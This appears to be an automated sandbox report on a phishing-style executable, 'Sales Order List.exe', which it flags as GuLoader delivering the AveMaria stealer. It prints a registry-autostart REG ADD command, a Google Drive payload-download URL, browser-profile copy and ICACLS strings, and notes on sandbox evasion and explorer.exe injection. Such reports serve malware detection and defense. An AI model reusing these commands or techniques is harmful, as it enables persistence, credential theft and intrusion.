                Source: Binary string: advapi32.pdb( source: WerFault.exe, 00000014.00000003.125907125589.0000000005C3A000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010636897.00000000033E6000.00000004.00000001.sdmp
                Source: Binary string: coml2.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126018806279.000000000648C000.00000004.00000001.sdmp
                Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008791375.00000000033D5000.00000004.00000001.sdmp
                Source: Binary string: WinTypes.pdb( source: WerFault.exe, 00000017.00000003.126024539923.00000000068B8000.00000004.00000001.sdmp
                Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126010047688.00000000033F1000.00000004.00000001.sdmp
                Source: Binary string: ws2_32.pdb8H 8 source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
                Source: Binary string: wrpcrt4.pdb( source: WerFault.exe, 00000017.00000003.126013564666.00000000033F7000.00000004.00000001.sdmp
                Source: Binary string: msctf.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126021040208.0000000006486000.00000004.00000001.sdmp
                Source: Binary string: ,wntdll.pdb source: WerFault.exe, 00000014.00000003.125899412774.0000000002D70000.00000004.00000001.sdmp
                Source: Binary string: wwin32u.pdb( source: WerFault.exe, 00000017.00000003.126008696474.00000000033CA000.00000004.00000001.sdmp
                Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000014.00000003.125910630742.0000000005D0D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022159017.0000000006493000.00000004.00000001.sdmp
                Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126018047691.0000000006475000.00000004.00000001.sdmp
                Source: Binary string: TextShaping.pdb( source: WerFault.exe, 00000014.00000003.125917002362.0000000006562000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023187158.00000000068BD000.00000004.00000001.sdmp
                Source: Binary string: ws2_32.pdb( source: WerFault.exe, 00000014.00000003.125917746027.0000000005D1E000.00000004.00000001.sdmp
                Source: Binary string: wUxTheme.pdb( source: WerFault.exe, 00000017.00000003.126019837993.000000000613C000.00000004.00000001.sdmp
                Source: Binary string: wgdi32.pdb( source: WerFault.exe, 00000014.00000003.125905520713.0000000002DF6000.00000004.00000001.sdmp
                Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.125909199577.0000000005CF1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016848001.000000000647B000.00000004.00000001.sdmp
                Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Sales Order List.exe, 00000004.00000003.125766201878.000000001F5C1000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.125849081972.000000000EA70000.00000040.00000001.sdmp
                Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Sales Order List.exe, 00000004.00000003.125766201878.000000001F5C1000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.125849081972.000000000EA70000.00000040.00000001.sdmp
                Source: Binary string: msctf.pdb( source: WerFault.exe, 00000014.00000003.125910562779.0000000005D02000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126021040208.0000000006486000.00000004.00000001.sdmp
                Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000014.00000003.125903704223.0000000002D7B000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
                Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.125907854720.0000000002E1D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010408748.00000000060E2000.00000004.00000001.sdmp
                Source: Binary string: wuser32.pdb( source: WerFault.exe, 00000014.00000003.125905424783.0000000002DEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008630763.00000000033C4000.00000004.00000001.sdmp
                Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000014.00000003.125903667098.0000000002D75000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009250720.000000000334B000.00000004.00000001.sdmp
                Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126012936139.000000000646A000.00000004.00000001.sdmp
                Source: Binary string: coml2.pdb} source: WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: TextInputFramework.pdb( source: WerFault.exe, 00000014.00000003.125910630742.0000000005D0D000.00000004.00000001.sdmp
                Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.125927969397.0000000005260000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126009354250.0000000003358000.00000004.00000001.sdmp
                Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.125905424783.0000000002DEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008630763.00000000033C4000.00000004.00000001.sdmp
                Source: Binary string: ole32.pdb( source: WerFault.exe, 00000014.00000003.125907817675.0000000002E17000.00000004.00000001.sdmp
                Source: Binary string: msvcp_win.pdb( source: WerFault.exe, 00000014.00000003.125904042199.0000000002E01000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008843786.00000000033DB000.00000004.00000001.sdmp

                Data Obfuscation:

                Yara detected GuLoaderShow sources
                Source: Yara matchFile source: 00000002.00000002.125547203981.00000000022E0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000000.125996962988.0000000002330000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000000.125886367131.0000000002330000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000000.125545111088.0000000001660000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000000.125990940523.0000000002330000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000000.125891818807.0000000002330000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.126072449802.0000000002330000.00000040.00000001.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_00404402 pushfd ; retf
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_00403827 push es; ret
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_004044E6 pushfd ; retf
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_0040A880 pushfd ; ret
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_0040A101 push edx; retf
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_00404585 pushfd ; retf
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_0040459A pushfd ; retf
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_004051BF push dword ptr [esi]; iretd
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_0040665E pushfd ; retf
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_0040427A pushfd ; retf
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_004062C2 pushfd ; retf
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_0040A6C2 push ebx; retf
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_004072E2 pushfd ; retf
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_0040434A pushfd ; retf
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_00404336 pushfd ; retf
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_0040633E pushfd ; retf
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_004067DF pushfd ; retf
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E1E3D pushad ; retn EE2Ch
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022ED671 push 1D9AA5CFh; iretd
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E1698 push ebx; retn F070h
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E3D31 push ebp; retf 67B7h
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E1AD3 pushad ; retn EE2Ch
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E9B0B push ebp; retf
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E5FF4 push esp; iretd
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EC7CD push 1D6C9AC2h; retn 6C9Ah
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022ED414 push 3A04CBC7h; retf
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E0012 push AE35C959h; retf
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E6479 push esp; iretd
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E24F2 push 812B1A06h; ret
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E2D33 push ebp; retf 57CCh
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EDD13 push 708CCF4Eh; iretd
                Source: C:\Users\user\Desktop\Sales Order List.exeFile created: C:\ProgramData\images.exeJump to dropped file
                Source: C:\Users\user\Desktop\Sales Order List.exeFile created: C:\ProgramData\images.exeJump to dropped file

                Boot Survival:

                Creates an undocumented autostart registry key Show sources
                Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows LoadJump to behavior

                Hooking and other Techniques for Hiding and Protection:

                Contains functionality to hide user accountsShow sources
                Source: Sales Order List.exe, 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: Sales Order List.exe, 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
                Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                Source: C:\Users\user\Desktop\Sales Order List.exeFile opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\Sales Order List.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\Sales Order List.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Sales Order List.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Sales Order List.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                Tries to detect Any.runShow sources
                Source: C:\Users\user\Desktop\Sales Order List.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
                Source: C:\Users\user\Desktop\Sales Order List.exeFile opened: C:\Program Files\qga\qga.exe
                Source: C:\Users\user\Desktop\Sales Order List.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
                Source: C:\Users\user\Desktop\Sales Order List.exeFile opened: C:\Program Files\qga\qga.exe
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                Source: Sales Order List.exe, 00000002.00000002.125548712664.00000000053D0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
                Source: Sales Order List.exe, 00000002.00000002.125548712664.00000000053D0000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877417935.0000000003310000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
                Source: C:\Users\user\Desktop\Sales Order List.exe TID: 7532Thread sleep count: 70 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022F3AA0 rdtsc
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 4_3_018A1329 sldt word ptr [eax]
                Source: C:\Users\user\Desktop\Sales Order List.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Sales Order List.exeSystem information queried: ModuleInformation
                Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                Source: WerFault.exe, 00000017.00000002.126063872302.0000000003308000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWu
                Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                Source: Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
                Source: WerFault.exe, 00000014.00000003.125951857336.0000000002E13000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllppsessionguid" val="00001060-0001-0011-c1a2-7ed0d8dfd701" />
                Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                Source: Sales Order List.exe, 00000004.00000003.125872058569.000000000189B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW-
                Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                Source: explorer.exe, 0000000B.00000002.130418618344.0000000010A3B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW2
                Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                Source: Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmpBinary or memory string: vmicvss
                Source: Sales Order List.exe, explorer.exe, 0000000B.00000002.130418921281.0000000010A5F000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.125980596864.0000000002E13000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.126063872302.0000000003308000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                Source: Sales Order List.exe, 00000004.00000002.125877417935.0000000003310000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn
                Source: Amcache.hve.20.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Sales Order List.exe, 00000002.00000002.125548712664.00000000053D0000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877417935.0000000003310000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
                Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
                Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
                Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
                Source: Sales Order List.exe, 00000002.00000002.125548712664.00000000053D0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll
                Source: Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

                Anti Debugging:

                Hides threads from debuggersShow sources
                Source: C:\Users\user\Desktop\Sales Order List.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\Sales Order List.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022F3AA0 rdtsc
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022F2200 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022ED2AB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022F4F00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022ED079 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022F2DB4 mov eax, dword ptr fs:[00000030h]
                Source: C:\ProgramData\images.exeCode function: 15_2_02342200 mov eax, dword ptr fs:[00000030h]
                Source: C:\ProgramData\images.exeCode function: 15_2_0233D2AD mov eax, dword ptr fs:[00000030h]
                Source: C:\ProgramData\images.exeCode function: 15_2_02344F00 mov eax, dword ptr fs:[00000030h]
                Source: C:\ProgramData\images.exeCode function: 15_2_02342DB4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Sales Order List.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\Sales Order List.exeProcess queried: DebugPort
                Source: C:\ProgramData\images.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EEE64 LdrInitializeThunk,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022F6B37 RtlAddVectoredExceptionHandler,
                Source: C:\ProgramData\images.exeCode function: 15_2_02346B37 RtlAddVectoredExceptionHandler,

                HIPS / PFW / Operating System Protection Evasion:

                Writes to foreign memory regionsShow sources
                Source: C:\Users\user\Desktop\Sales Order List.exeMemory written: C:\Windows\explorer.exe base: 33370000
                Source: C:\Users\user\Desktop\Sales Order List.exeMemory written: C:\Windows\explorer.exe base: EA70000
                Allocates memory in foreign processesShow sources
                Source: C:\Users\user\Desktop\Sales Order List.exeMemory allocated: C:\Windows\explorer.exe base: EA70000 protect: page execute and read and write
                Source: C:\Users\user\Desktop\Sales Order List.exeMemory allocated: C:\Windows\explorer.exe base: 33370000 protect: page execute and read and write
                Injects code into the Windows Explorer (explorer.exe)Show sources
                Source: C:\Users\user\Desktop\Sales Order List.exeMemory written: PID: 4576 base: 33370000 value: 58
                Source: C:\Users\user\Desktop\Sales Order List.exeMemory written: PID: 4576 base: EA70000 value: E8
                Source: C:\Users\user\Desktop\Sales Order List.exeProcess created: C:\Users\user\Desktop\Sales Order List.exe "C:\Users\user\Desktop\Sales Order List.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
                Source: explorer.exe, 0000000B.00000000.125828329284.0000000004ECA000.00000004.00000001.sdmp, images.exe, 0000000F.00000000.125990083122.0000000000DB1000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 0000000B.00000000.125822649436.0000000000FB0000.00000002.00020000.sdmp, images.exe, 0000000F.00000000.125990083122.0000000000DB1000.00000002.00020000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 0000000B.00000002.130379665541.00000000008E9000.00000004.00000020.sdmpBinary or memory string: 1Progman
                Source: explorer.exe, 0000000B.00000000.125822649436.0000000000FB0000.00000002.00020000.sdmp, images.exe, 0000000F.00000000.125990083122.0000000000DB1000.00000002.00020000.sdmpBinary or memory string: 5Program ManagerJ
                Source: explorer.exe, 0000000B.00000000.125822649436.0000000000FB0000.00000002.00020000.sdmp, images.exe, 0000000F.00000000.125990083122.0000000000DB1000.00000002.00020000.sdmpBinary or memory string: Progmanlock

                Lowering of HIPS / PFW / Operating System Security Settings:

                Increases the number of concurrent connection per server for Internet ExplorerShow sources
                Source: C:\Users\user\Desktop\Sales Order List.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior
                Source: Amcache.hve.20.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.20.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.20.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.2107.4-0\msmpeng.exe
                Source: Amcache.hve.20.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information:

                Yara detected Generic DropperShow sources
                Source: Yara matchFile source: Process Memory Space: Sales Order List.exe PID: 6892, type: MEMORYSTR
                Yara detected AveMaria stealerShow sources
                Source: Yara matchFile source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
                GuLoader behavior detectedShow sources
                Source: Initial fileSignature Results: GuLoader behavior
                Source: Yara matchFile source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Sales Order List.exe PID: 6892, type: MEMORYSTR

                Remote Access Functionality:

                Yara detected AveMaria stealerShow sources
                Source: Yara matchFile source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
